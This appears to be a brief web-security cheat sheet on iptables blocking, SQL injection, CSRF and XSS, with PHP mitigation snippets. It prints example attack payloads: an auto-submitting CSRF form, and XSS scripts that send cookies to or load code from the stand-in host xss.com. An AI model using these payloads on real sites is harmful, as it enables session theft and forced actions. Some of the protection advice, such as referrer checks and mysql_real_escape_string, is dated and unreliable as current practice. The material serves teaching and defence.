iptables -A INPUT -s xxx.xxx.xxx.xxx -j DROP
iptables save
Category: Security
SQL Injection
Definition: http://en.wikipedia.org/wiki/SQL_injection
Protection: Filtering & Escaping
$name = $_POST[‘name’];
// Filter
if (!ctype_alpha($name)) exit;// Escape
$name = mysql_real_escape_string($name);$query = “SELECT * FROM users WHERE name = ‘{$name}'”;
Cross-Site Request Forgeries (CSRF)
Definition: http://en.wikipedia.org/wiki/Cross-site_request_forgery
Example:
<img src=”http://csrf.com/logout?confirm=true”>
<body onload=”$(‘form’).submit()”>
<form action=”http://csrf.com/” method=”post”>
<input name=”confirm” value=”true” />
</form>
</body>
Protection:
– Check the referrer
– Insert a token to the form, store the token and token_time in session
– Insert the cookies to the form via js (remote XmlHttpRequest calls cannot read cookies)
Cross Site Scripting (XSS)
Definition: http://en.wikipedia.org/wiki/Cross-site_scripting
XSS Cheat Sheet: http://ha.ckers.org/xss.html#XSScalc
XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped.
Example:
<?php echo $_POST[‘name’]; ?>
Examples of XSS exploits:
<script>alert('xss')</script>
<script>new Image().src=’http://xss.com/xss.php?cookies=’+encodeURI(document.cookie)</script>
<script src=”http://xss.com/xss.js”></script>
Protection:
– Validate the input
– Escape the input / output
<?php echo htmlentities($_POST[‘name’], ENT_QUOTES, ‘UTF-8’);?>
– Only allow the same IP to access the cookie